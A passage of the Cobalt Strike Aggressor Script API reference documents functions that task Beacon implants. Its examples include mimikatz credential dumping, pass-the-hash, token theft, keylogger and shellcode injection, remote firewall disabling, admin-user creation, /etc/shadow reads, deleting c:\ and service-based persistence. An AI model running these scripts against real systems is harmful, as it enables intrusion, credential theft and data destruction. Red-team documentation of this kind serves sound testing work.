bind("Ctrl+Left", {
previousTab();
});
bind("Ctrl+Right", {
nextTab();
});
See also
binfo
Get information from a Beacon session's metadata.
Arguments
$1 - the id for the beacon to pull metadata for
$2 - the key to extract
Returns
A string with the requested information.
Example
println("User is: " . binfo("1234", "user"));
println("PID is: " . binfo("1234", "pid"));
binline_execute
Execute a Beacon Object File. This is the same as using the inline-execute command in Beacon.
Arguments
$1 - the id for the Beacon
$2 - the path to the BOF file
$3 - the string argument to pass to the BOF file
$4 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map
Notes
This functions follows the behavior of *inline-execute* in the Beacon console. The string argument will be zero-terminated, converted to the target encoding, and passed as an argument to the BOF's go function. To execute a BOF, with more control, use &beacon_inline_execute
The Cobalt Strike documentation has a page specific to BOF files. See Beacon Object Files.
binput
Report a command was run to the Beacon console and logs. Scripts that execute commands for the user (e.g., events, popup menus) should use this function to assure operator attribution of automated actions in Beacon's logs.
Arguments
$1 - the id for the beacon to post to
$2 - the text to post
Example
# indicate the user ran the ls command binput($1, "ls");
bipconfig
Task a Beacon to list network interfaces.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - callback function with the ipconfig results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map
Example
alias ipconfig {
bipconfig($1, {
blog($1, "Network information is:\n $+ $2");
});
}
bjobkill
Ask Beacon to kill a running post-exploitation job
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the job ID.
Example
bjobkill($1, 0);
bjobs
Ask Beacon to list running post-exploitation jobs.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example
bjobs($1);
bjump
Ask Beacon to spawn a session on a remote target.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the technique to use
$3 - the remote target
$4 - the listener to spawn
Example
# winrm [target] [listener]
alias winrm {
bjump($1, "winrm", $2, $3);
}
See also
&beacon_remote_exploit_describe, &beacon_remote_exploit_register, &beacon_remote_exploits
bkerberos_ccache_use
Ask beacon to inject a UNIX kerberos ccache file into the user's kerberos tray
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the local path the ccache file
Example
alias kerberos_ccache_use {
bkerberos_ccache_use($1, $2);
}
bkerberos_ticket_purge
Ask beacon to purge tickets from the user's kerberos tray
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example
alias kerberos_ticket_purge {
bkerberos_ticket_purge($1);
}
bkerberos_ticket_use
Ask beacon to inject a mimikatz kirbi file into the user's kerberos tray
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the local path the kirbi file
Example
alias kerberos_ticket_use {
bkerberos_ticket_use($1, $2);
}
bkeylogger
Injects a keystroke logger into a process.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - (optional) the PID to inject the keystroke logger into or $null.
$3 - (optional) the architecture of the target PID (x86|x64) or $null.
Example
Spawn a temporary process
bkeylogger($1);
Inject into the specified process
bkeylogger($1, 1234, "x64");
bkill
Ask Beacon to kill a process
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the PID to kill
Example
bkill($1, 1234);
blink
Ask Beacon to link to a host over a named pipe
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the target to link to
$3 - (optional) the pipename to use. The default pipename in the Malleable C2 profile is the default otherwise.
Note
Use &beacon_link if you want a script function that will connect or link based on a listener configuration.
Example
blink($1, "DC");
blog
Publishes an output message to the Beacon transcript.
Arguments
$1 - the id for the beacon to post to
$2 - the text to post
Example
alias demo {
blog($1, "I am output for the blog function");
}
blog2
Publishes an output message to the Beacon transcript. This function has an alternate format from &blog
Arguments
$1 - the id for the beacon to post to
$2 - the text to post
Example
alias demo2 {
blog2($1, "I am output for the blog2 function");
}
bloginuser
Ask Beacon to create a token from the specified credentials. This is the make_token command.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the domain of the user
$3 - the user's username
$4 - the user's password
Example
# make a token for a user with an empty password
alias make_token_empty {
local('$domain $user');
($domain, $user) = split("\\\\", $2);
bloginuser($1, $domain, $user, "");
}
blogonpasswords
Ask Beacon to dump in-memory credentials with mimikatz. This function requires administrator privileges.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - (optional) the PID to inject the logonpasswords command into or $null
$3 - (optional) the architecture of the target PID (x86|x64) or $null
Example
Spawn a temporary process
item "Dump &Passwords" {
binput($1, "logonpasswords");
blogonpasswords($1);
}
Inject into the specified process
beacon_command_register(
"logonpasswords_inject",
"Inject into a process and dump in-memory credentials with mimikatz",
"Usage: logonpasswords_inject [pid] [arch]");
alias logonpasswords_inject {
blogonpasswords($1, $2, $3);
}
bls
Task a Beacon to list files
Variations
bls($1, "folder");
Output the results to the Beacon console.
bls($1, "folder", &callback);
Route results to the specified callback function.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - (optional) the folder to list files for. Use "." for the current folder.
$3 - (optional) callback function with the ls results. Arguments to the callback are: $1 = beacon ID, $2 = the folder, $3 = results
Example
on beacon_initial {
bls($1, ".");
}
bmimikatz
Ask Beacon to run a mimikatz command.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the command and arguments to run. Supports the semicolon ( ; ) character to separate multiple commands
$3 - (optional) the PID to inject the mimikatz command into or $null
$4 - (optional) the architecture of the target PID (x86|x64) or $null
$5 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map
Examples
# Usage: coffee [pid] [arch]
alias coffee {
if ($2 >= 0 && ($3 eq "x86" || $3 eq "x64")) {
bmimikatz($1, "standard::coffee", $2, $3);
} else {
bmimikatz($1, "standard::coffee");
}
}
alias double_espresso {
bmimikatz($1, "standard::coffee;standard::coffee");
}
bmimikatz_small
Use Cobalt Strike's "smaller" internal build of Mimikatz to execute a mimikatz command.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the command and arguments to run. Supports the semicolon ( ; ) character to separate multiple commands
$3 - (optional) the PID to inject the mimikatz command into or $null
$4 - (optional) the architecture of the target PID (x86|x64) or $null
$5 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map
Note
This mimikatz build supports:
* kerberos::golden * lsadump::dcsync * sekurlsa::logonpasswords * sekurlsa::pth
All of the other stuff is removed for size. Use &bmimikatz if you want to bring the full power of mimikatz to some other offense problem.
Example
# Usage: logonpasswords_elevate [pid] [arch]
alias logonpasswords_elevate {
if ($2 >= 0 && ($3 eq "x86" || $3 eq "x64")) {
bmimikatz_small($1, "!sekurlsa::logonpasswords", $2, $3);
} else {
bmimikatz_small($1, "!sekurlsa::logonpasswords");
}
}
bmkdir
Ask Beacon to make a directory
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the folder to create
Example
bmkdir($1, "you are owned");
bmode
Change the data channel for a DNS Beacon.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the data channel (e.g., dns, dns6, or dns-txt)
Example
item "Mode DNS-TXT" {
binput($1, "mode dns-txt");
bmode($1, "dns-txt");
}
bmv
Ask Beacon to move a file or folder.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the file or folder to move
$3 - the destination
Example
bmv($1, "evil.exe", "\\\\target\\\C$\\evil.exe");
bnet
Run a command from Beacon's network and host enumeration tool.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the command to run.
| Type | Description |
|---|---|
| computers | lists hosts in a domain (groups) |
| dclist | lists domain controllers |
| domain | show the current domain |
| domain_controllers | list domain controller hosts in a domain (groups) |
| domain_trusts | lists domain trusts |
| group | lists groups and users in groups |
| localgroup | lists local groups and users in local groups |
| logons | lists users logged onto a host |
| sessions | lists sessions on a host |
| share | lists shares on a host |
| user | lists users and user information |
| time | show time for a host |
| view | lists hosts in a domain (browser service) |
$3 - the target to run this command against or $null
$4 - the parameter to this command (e.g., a group name)
$5 - (optional) the PID to inject the network and host enumeration tool into or $null
$6 - (optional) the architecture of the target PID (x86|x64) or $null
$7 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map
The domain command executes a BOF using inline_execute and will not spawn or inject into a process
Example
Spawn a temporary process
# ladmins [target]
# find the local admins for a target
alias ladmins {
bnet($1, "localgroup", $2, "administrators");
}
Inject into the specified process
# ladmins [pid] [arch] [target]
# find the local admins for a target
alias ladmins {
bnet($1, "localgroup", $4, "administrators", $2, $3);
}
bnote
Assign a note to the specified Beacon.
Arguments
$1 - the id for the beacon to post to
$2 - the note content
Example
bnote($1, "foo");
bof_extract
This function extracts the executable code from the beacon object file.
Arguments
$1 - A string containing the beacon object file
Example
$handle = openf(script_resource("/object_file"));
$data = readb($handle, -1);
closef($handle);
return bof_extract($data);
bof_pack
Pack arguments in a way that's suitable for BOF APIs to unpack.
Arguments
$1 - the id for the Beacon (needed for unicode conversions)
$2 - format string for the packed data
... - one argument per item in our format string
Note
This function packs its arguments into a binary structure for use with &beacon_inline_execute. The format string options here correspond to the BeaconData* C API available to BOF files. This API handles transformations on the data and hints as required by each type it can pack.
| Type | Description | Unpack With (C) |
|---|---|---|
| b | binary data | BeaconDataExtract |
| i | 4-byte integer | BeaconDataInt |
| s | 2-byte short integer | BeaconDataShort |
| z | zero-terminated+encoded string | BeaconDataExtract |
| Z | zero-terminated wide-char string | (wchar_t *)BeaconDataExtract |
The Cobalt Strike documentation has a page specific to BOF files. See Beacon Object Files.
See also
bpassthehash
Ask Beacon to create a token that passes the specified hash. This is the pth command in Beacon. It uses mimikatz. This function requires administrator privileges.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the domain of the user
$3 - the user's username
$4 - the user's password hash
$5 - (optional) the PID to inject the pth command into or $null
$6 - (optional) the architecture of the target PID (x86|x64) or $null
Example
Spawn a temporary process
bpassthehash($1, "CORP", "Administrator", "password_hash");
Inject into the specified process
bpassthehash($1, "CORP", "Administrator", "password_hash", 1234, "x64");
bpause
Ask Beacon to pause its execution. This is a one-off sleep.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - how long the Beacon should pause execution for (milliseconds)
Example
alias pause {
bpause($1, int($2));
}
bportscan
Ask Beacon to run its port scanner.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the targets to scan (e.g., 192.168.12.0/24)
$3 - the ports to scan (e.g., 1-1024,6667)
$4 - the discovery method to use (arp|icmp|none)
$5 - the max number of sockets to use (e.g., 1024)
$6 - (optional) the PID to inject the port scanner into or $null
$7 - (optional) the architecture of the target PID (x86|x64) or $null
$8 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map
Example
Spawn a temporary process
bportscan($1, "192.168.12.0/24", "1-1024,6667", "arp", 1024);
Inject into the specified process
bportscan($1, "192.168.12.0/24", "1-1024,6667", "arp", 1024, 1234, "x64");
bpowerpick
Spawn a process, inject Unmanaged PowerShell, and run the specified command.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the cmdlet and arguments
$3 - (optional) if specified, powershell-import script is ignored and this argument is treated as the download cradle to prepend to the command. Empty string is OK here too, for no download cradle. Specify $null to use the current imported PowerShell script.
$4 - (optional) the "PATCHES:" argument can modify functions in memory for the process. Up to 4 "patch-rule" rules can be specified (space delimited).
$5 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map
"patch-rule" syntax (comma delimited): [library],[function],[offset],[hex-patch-value]
library - 1-260 characters
function - 1-256 characters
offset - 0-65535 (The offset from the start of the executable function)
hex-patch-value - 2-200 hex characters (0-9,A-F). Length must be even number (hex pairs).
Example
# get the version of PowerShell available via Unmanaged PowerShell
alias powerver {
bpowerpick($1, '$PSVersionTable.PSVersion');
}
alias powerver2 {
bpowerpick($1, '$PSVersionTable.PSVersion', '', 'PATCHES: ntdll.dll,EtwEventWrite,0,C300');
}
bpowershell
Ask Beacon to run a PowerShell cmdlet
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the cmdlet and arguments
$3 - (optional) if specified, powershell-import script is ignored and this argument is treated as the download cradle to prepend to the command. Empty string is OK here too, for no download cradle. Specify $null to use the current imported PowerShell script.
$4 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map
Example
# get the version of PowerShell...
alias powerver {
bpowershell($1, '$PSVersionTable.PSVersion');
}
bpowershell_import
Import a PowerShell script into a Beacon
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the path to the local file to import
Example
# quickly run PowerUp
alias powerup {
bpowershell_import($1, script_resource("PowerUp.ps1"));
bpowershell($1, "Invoke-AllChecks");
}
bpowershell_import_clear
Clear the imported PowerShell script from a Beacon session.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example
alias powershell-clear {
bpowershell_import_clear($1);
}
bppid
Set a parent process for Beacon's child processes
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the parent process ID. Specify 0 to reset to default behavior.
Notes
- The current session must have rights to access the specified parent process.
- Attempts to spawn post-ex jobs under parent processes in another desktop session may fail. This limitation is due to how Beacon launches its "temporary" processes for post-exploitation jobs and injects code into them.
Example
alias prepenv {
btask($1, "Tasked Beacon to find explorer.exe and make it the PPID");
bps($1, {
local('$pid $name $entry');
foreach $entry (split("\n", $2)) {
($name, $null, $pid) = split("\\s+", $entry);
if ($name eq "explorer.exe") {
bppid($1, $pid);
}
}
});
}
bprintscreen
Ask Beacon to take a screenshot via PrintScr method.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - (optional) the PID to inject the screenshot tool via PrintScr method or $null.
$3 - (optional) the architecture of the target PID (x86|x64) or $null.
Example
Spawn a temporary process
item "&Printscreen" {
binput($1, "printscreen");
bpintscreen($1);
}
Inject into the specified process
bprintscreen($1, 1234, "x64");
bps
Task a Beacon to list processes
Variations
bps($1);
Output the results to the Beacon console.
bps($1, &callback);
Route results to the specified callback function.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - (optional) callback function with the ps results. Arguments to the callback are: $1 = beacon ID, $2 = results
Example
on beacon_initial {
bps($1);
}
alias prepenv {
btask($1, "Tasked Beacon to find explorer.exe and make it the PPID");
bps($1, {
local('$pid $name $entry');
foreach $entry (split("\n", $2)) {
($name, $null, $pid) = split("\\s+", $entry);
if ($name eq "explorer.exe") {
bppid($1, $pid);
}
}
});
}
bpsexec
Ask Beacon to spawn a payload on a remote host. This function generates an Artifact Kit executable, copies it to the target, and creates a service to run it and clean it up.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the target to spawn a payload onto
$3 - the listener to spawn
$4 - the share to copy the executable to
$5 - the architecture of the payload to generate/deliver (x86 or x64)
Example
brev2self(); bloginuser($1, "CORP", "Administrator", "toor"); bpsexec($1, "172.16.48.3", "my listener", "ADMIN\$");
bpsexec_command
Ask Beacon to run a command on a remote host. This function creates a service on the remote host, starts it, and cleans it up.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the target to run the command on
$3 - the name of the service to create
$4 - the command to run.
Example
# disable the firewall on a remote target
# beacon> shieldsdown [target]
alias shieldsdown {
bpsexec_command($1, $2, "shieldsdn", "cmd.exe /c netsh advfirewall set allprofiles state off");
}
bpsexec_psh
REMOVED Removed in Cobalt Strike 4.0. Use &bjump with psexec_psh option.
bpsinject
Inject Unmanaged PowerShell into a specific process and run the specified cmdlet. This will use the current imported powershell script.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the process to inject the session into
$3 - the process architecture (x86 | x64)
$4 - the cmdlet to run
$5 - (optional) callback function with the results. Arguments to the callback are: $1 = beacon ID, $2 = results, $3 = information map
Example
bpsinject($1, 1234, x64, "[System.Diagnostics.Process]::GetCurrentProcess()");
bpwd
Ask Beacon to print its current working directory
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example
alias pwd {
bpwd($1);
}
breg_query
Ask Beacon to query a key within the registry.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the path to the key
$3 - x86|x64 - which view of the registry to use
Example
alias typedurls {
breg_query($1, "HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs", "x86");
}
breg_queryv
Ask Beacon to query a value within a registry key.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the path to the key
$3 - the name of the value to query
$4 - x86|x64 - which view of the registry to use
Example
alias winver {
breg_queryv($1, "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion", "ProductName", "x86");
}
bremote_exec
Ask Beacon to run a command on a remote target.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the remote execute method to use
$3 - the remote target
$4 - the command and arguments to run
Example
# winrm [target] [command+args]
alias winrm-exec {
bremote_exec($1, "winrm", $2, $3); {
}
See also
&beacon_remote_exec_method_describe, &beacon_remote_exec_method_register, &beacon_remote_exec_methods
brev2self
Ask Beacon to drop its current token. This calls the RevertToSelf() Win32 API.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example
alias rev2self {
brev2self($1);
}
brm
Ask Beacon to remove a file or folder.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the file or folder to remove
Example
# nuke the system brm($1, "c:\\");
brportfwd
Ask Beacon to setup a reverse port forward.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the port to bind to on the target
$3 - the host to forward connections to
$4 - the port to forward connections to
Example
brportfwd($1, 80, "192.168.12.88", 80);
brportfwd_local
Ask Beacon to setup a reverse port forward that routes to the current Cobalt Strike client.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the port to bind to on the target
$3 - the host to forward connections to
$4 - the port to forward connections to
Example
brportfwd_local($1, 80, "192.168.12.88", 80);
brportfwd_stop
Ask Beacon to stop a reverse port forward
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the port bound on the target
Example
brportfwd_stop($1, 80);
brun
Ask Beacon to run a command
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the command and arguments to run
Note
This capability is a simpler version of the &beacon_execute_job function. The latter function is what &bpowershell and &bshell build on. This is a (slightly) more OPSEC-safe option to run commands and receive output from them.
Example
alias w {
brun($1, "whoami /all");
}
brunas
Ask Beacon to run a command as another user.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the domain of the user
$3 - the user's username
$4 - the user's password
$5 - the command to run
Example
brunas($1, "CORP", "Administrator", "toor", "notepad.exe");
brunasadmin
REMOVED Removed in Cobalt Strike 4.0. Use &belevate_command with psexec_psh option.
Ask Beacon to run a command in a high-integrity context (bypasses UAC).
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the command and its arguments.
Notes
This command uses the Token Duplication UAC bypass. This bypass has a few requirements:
- Your user must be a local admin
- If Always Notify is enabled, an existing high integrity process must be running in the current desktop session.
Example
# disable the firewall brunasadmin($1, "cmd.exe /C netsh advfirewall set allprofiles state off");
brunu
Ask Beacon to run a process under another process.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the PID of the parent process
$3 - the command + arguments to run
Example
brunu($1, 1234, "notepad.exe");
bscreenshot
Ask Beacon to take a screenshot.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - (optional) the PID to inject the screenshot tool or $null
$3 - (optional) the architecture of the target PID (x86|x64) or $null
Example
Spawn a temporary process
item "&Screenshot" {
binput($1, "screenshot");
bscreenshot($1);
}
Inject into the specified process
bscreenshot($1, 1234, "x64");
bscreenwatch
Ask Beacon to take periodic screenshots
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - (optional) the PID to inject the screenshot tool or $null
$3 - (optional) the architecture of the target PID (x86|x64) or $null
Example
Spawn a temporary process
item "&Screenwatch" {
binput($1, "screenwatch");
bscreenwatch($1);
}
Inject into the specified process
bscreenwatch($1, 1234, "x64");
bsetenv
Ask Beacon to set an environment variable
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the environment variable to set
$3 - the value to set the environment variable to (specify $null to unset the variable)
Example
alias tryit {
bsetenv($1, "foo", "BAR!");
bshell($1, "echo %foo%");
}
bshell
Ask Beacon to run a command with cmd.exe
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the command and arguments to run
Example
alias adduser {
bshell($1, "net user $2 B00gyW00gy1234! /ADD");
bshell($1, "net localgroup \"Administrators\" $2 /ADD");
}
bshinject
Inject shellcode (from a local file) into a specific process
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the PID of the process to inject into
$3 - the process architecture (x86 | x64)
$4 - the local file with the shellcode
Example
bshinject($1, 1234, "x86", "/path/to/stuff.bin");
bshspawn
Spawn shellcode (from a local file) into another process. This function benefits from Beacon's configuration to spawn post-exploitation jobs (e.g., spawnto, ppid, etc.)
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the process architecture (x86 | x64)
$3 - the local file with the shellcode
Example
bshspawn($1, "x86", "/path/to/stuff.bin");
bsleep
Ask Beacon to change its beaconing interval and jitter factor.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the number of seconds between beacons.
$3 - the jitter factor [0-99]
Example
alias stealthy {
# sleep for 1 hour with 30% jitter factor
bsleep($1, 60 * 60, 30);
}
bsleepu
Ask Beacon to change its beaconing interval and jitter factor.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - beacon sleep period string.
The beacon sleep period string takes the format: ud vh xm ys zj
Were:
w is the number of days
v is the number of hours
x is the number of minutes
y is the number of seconds
z is the jitter factor [0 - 99]
Example
alias stealthy {
# sleep for 2 days 13 hours 45 minutes 8 seconds with 30% jitter factor
bsleepu($1, "2d 13h 45m 8s 30j");
}
bsocks
Start a SOCKS proxy server associated with a beacon.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the port to bind to
$3 - SOCKS version [SOCKS4|SOCKS5] Default: SOCKS4
For SOCKS 5 only:
$4 - enable/disable NoAuth authentication [enableNoAuth|disableNoAuth] Default: enableNoAuth
$5 - username for User/Password authentication [blank|username] Default: Blank
$6 - password for User/Password authentication [blank|password] Default: Blank
$7 - enable logging [enableLogging|disableLogging] Default: disableLogging
Example
alias socksPorts {
bsocks($1, 10401);
bsocks($1, 10402, "SOCKS4");
bsocks($1, 10501, "SOCKS5");
bsocks($1, 10502, "SOCKS5" "enableNoAuth", "", "", "disableLogging");
bsocks($1, 10503, "SOCKS5" "enableNoAuth", "myname", "mypassword", "disableLogging");
bsocks($1, 10504, "SOCKS5" "disableNoAuth", "myname", "mypassword", "enableLogging");
}
bsocks_stop
Stop SOCKS proxy servers associated with the specified Beacon.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example
alias stopsocks {
bsocks_stop($1);
}
bspawn
Ask Beacon to spawn a new session
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the listener to target.
$3 - the architecture to spawn a process for (defaults to current beacon arch)
Example
item "&Spawn" {
openPayloadHelper(lambda({
binput($bids, "spawn x86 $1");
bspawn($bids, $1, "x86");
}, $bids => $1));
}
bspawnas
Ask Beacon to spawn a session as another user.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the domain of the user
$3 - the user's username
$4 - the user's password
$5 - the listener to spawn
Example
bspawnas($1, "CORP", "Administrator", "toor", "my listener");
bspawnto
Change the default program Beacon spawns to inject capabilities into.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the architecture we're modifying the spawnto setting for (x86, x64)
$3 - the program to spawn
Notes
The value you specify for spawnto must work from x86->x86, x86->x64, x64->x86, and x64->x86 contexts. This is tricky. Follow these rules and you'll be OK:
1. Always specify the full path to the program you want Beacon to spawn for its post-ex jobs.
2. Environment variables (e.g., %windir%) are OK within these paths.
3. Do not specify %windir%\system32 or c:\windows\system32 directly. Always use syswow64 (x86) and sysnative (x64). Beacon will adjust these values to system32 if it's necessary.
4. For an x86 spawnto value, you must specify an x86 program. For an x64 spawnto value, you must specify an x64 program.
Example
# let's make everything lame.
on beacon_initial {
binput($1, "prep session with new spawnto values.");
bspawnto($1, "x86", "%windir%\\syswow64\\notepad.exe");
bspawnto($1, "x64", "%windir%\\sysnative\\notepad.exe");
}
bspawnu
Ask Beacon to spawn a session under another process.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the process to spawn this session under
$3 - the listener to spawn
Example
bspawnu($1, 1234, "my listener");
bspunnel
Spawn and tunnel an agent through this Beacon (via a target localhost-only reverse port forward)
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the host of the controller
$3 - the port of the controller
$4 - a file with position-independent code to execute in a temporary process.
Example
bspunnel($1, "127.0.0.1", 4444, script_resource("agent.bin"));
bspunnel_local
Spawn and tunnel an agent through this Beacon (via a target localhost-only reverse port forward). Note: this reverse port forward tunnel traverses through the Beacon chain to the team server and, via the team server, out through the requesting Cobalt Strike client.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the host of the controller
$3 - the port of the controller
$4 - a file with position-independent code to execute in a temporary process.
Example
bspunnel_local($1, "127.0.0.1", 4444, script_resource("agent.bin"));
bssh
Ask Beacon to spawn an SSH session.
Arguments
$1 - id for the beacon. This may be an array or a single ID.
$2 - IP address or hostname of the target
$3 - port (e.g., 22)
$4 - username
$5 - password
$6 - (optional) the PID to inject the SSH client into or $null
$7 - (optional) the architecture of the target PID (x86|x64) or $null
Example
Spawn a temporary process
bssh($1, "172.16.20.128", 22, "root", "toor");
Inject into the specified process
bssh($1, "172.16.20.128", 22, "root", "toor", 1234, "x64");
bssh_key
Ask Beacon to spawn an SSH session using the data from a key file. The key file needs to be in the PEM format. If the file is not in the PEM format then make a copy of the file and convert the copy with the following command:
/usr/bin/ssh-keygen -f [/path/to/copy] -e -m pem -p
Arguments
$1 - id for the beacon. This may be an array or a single ID.
$2 - IP address or hostname of the target
$3 - port (e.g., 22)
$4 - username
$5 - key data (as a string)
$6 - (optional) the PID to inject the SSH client into or $null
$7 - (optional) the architecture of the target PID (x86|x64) or $null
Example
alias myssh {
$pid = $2;
$arch = $3;
$handle = openf("/path/to/key.pem");
$keydata = readb($handle, -1);
closef($handle);
if ($pid >= 0 && ($arch eq "x86" || $arch eq "x64")) {
bssh_key($1, "172.16.20.128", 22, "root", $keydata, $pid, $arch);
} else {
bssh_key($1, "172.16.20.128", 22, "root", $keydata);
}
};
bstage
REMOVED This function is removed in Cobalt Strike 4.0. Use &beacon_stage_tcp or &beacon_stage_pipe to explicitly stage a payload. Use &beacon_link to link to it.
bsteal_token
Ask Beacon to steal a token from a process.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the PID to take the token from
Use: bsteal_token [pid]
bsteal_token [pid] <OpenProcessToken access mask>
OpenProcessToken access mask suggested values:
blank = default (TOKEN_ALL_ACCESS)
0 = TOKEN_ALL_ACCESS
11 = TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY (1+2+8)
Access mask values:
STANDARD_RIGHTS_REQUIRED . . . . : 983040
TOKEN_ASSIGN_PRIMARY . . . . . . : 1
TOKEN_DUPLICATE . . . . . . . . : 2
TOKEN_IMPERSONATE . . . . . . . : 4
TOKEN_QUERY . . . . . . . . . . : 8
TOKEN_QUERY_SOURCE . . . . . . . : 16
TOKEN_ADJUST_PRIVILEGES . . . . : 32
TOKEN_ADJUST_GROUPS . . . . . . : 64
TOKEN_ADJUST_DEFAULT . . . . . . : 128
TOKEN_ADJUST_SESSIONID . . . . . : 256
'OpenProcessToken access mask' can be helpful for stealing tokens from processes using 'SYSTEM' user and you have this error: Could not open process token: {pid} (5)
You can set your preferred default with '.steal_token_access_mask' in the Malleable C2 global options.
Example
alias steal_token {
bsteal_token($1, int($2));
}
bsudo
Ask Beacon to run a command via sudo (SSH sessions only)
Arguments
$1 - the id for the session. This may be an array or a single ID.
$2 - the password for the current user
$3 - the command and arguments to run
Example
# hashdump [password]
ssh_alias hashdump {
bsudo($1, $2, "cat /etc/shadow");
}
bsyscall_method
Ask Beacon to change its syscall method.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the syscall method. Supported methods are:
Direct: Use the Nt* version of the function.
Indirect: Jump to the appropriate instruction within the Nt* version of the function.
If the $2 argument is empty, Beacon is tasked to query the currently used syscall method.
Example
alias syscall_method {
bsyscall_method($1, $2);
}
btask
Report a task acknowledgement for a Beacon. This task acknowledgement will also contribute to the narrative in Cobalt Strike's Activity Report and Sessions Report.
Arguments
$1 - the id for the beacon to post to
$2 - the text to post
$3 - a string with MITRE ATT&CK Tactic IDs. Use a comma and a space to specify multiple IDs in one string.
Example
alias foo {
btask($1, "User tasked beacon to foo", "T1015");
}
btimestomp
Ask Beacon to change the file modified/accessed/created times to match another file.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the file to update timestamp values for
$3 - the file to grab timestamp values from
Example
alias persist {
bcd($1, "c:\\windows\\system32");
bupload($1, script_resource("evil.exe"));
btimestomp($1, "evil.exe", "cmd.exe");
bshell($1, 'sc create evil binpath= "c:\\windows\\system32\\evil.exe"');
bshell($1, 'sc start evil');
}
btoken_store_remove
Ask Beacon to remove specific access tokens from the store.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the array of token IDs to remove.
Example
alias token-store_remove {
btoken_store_remove($1, @(int($2)));
}
btoken_store_remove_all
Ask Beacon to remove all tokens from the store.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example
alias token-store_remove_all {
btoken_store_remove_all($1);
}
btoken_store_show
Ask Beacon to print the tokens currently available in the token store.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example
alias token-store_show {
btoken_store_show($1);
}
btoken_store_steal
Ask Beacon to steal a token and store it in the token store.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
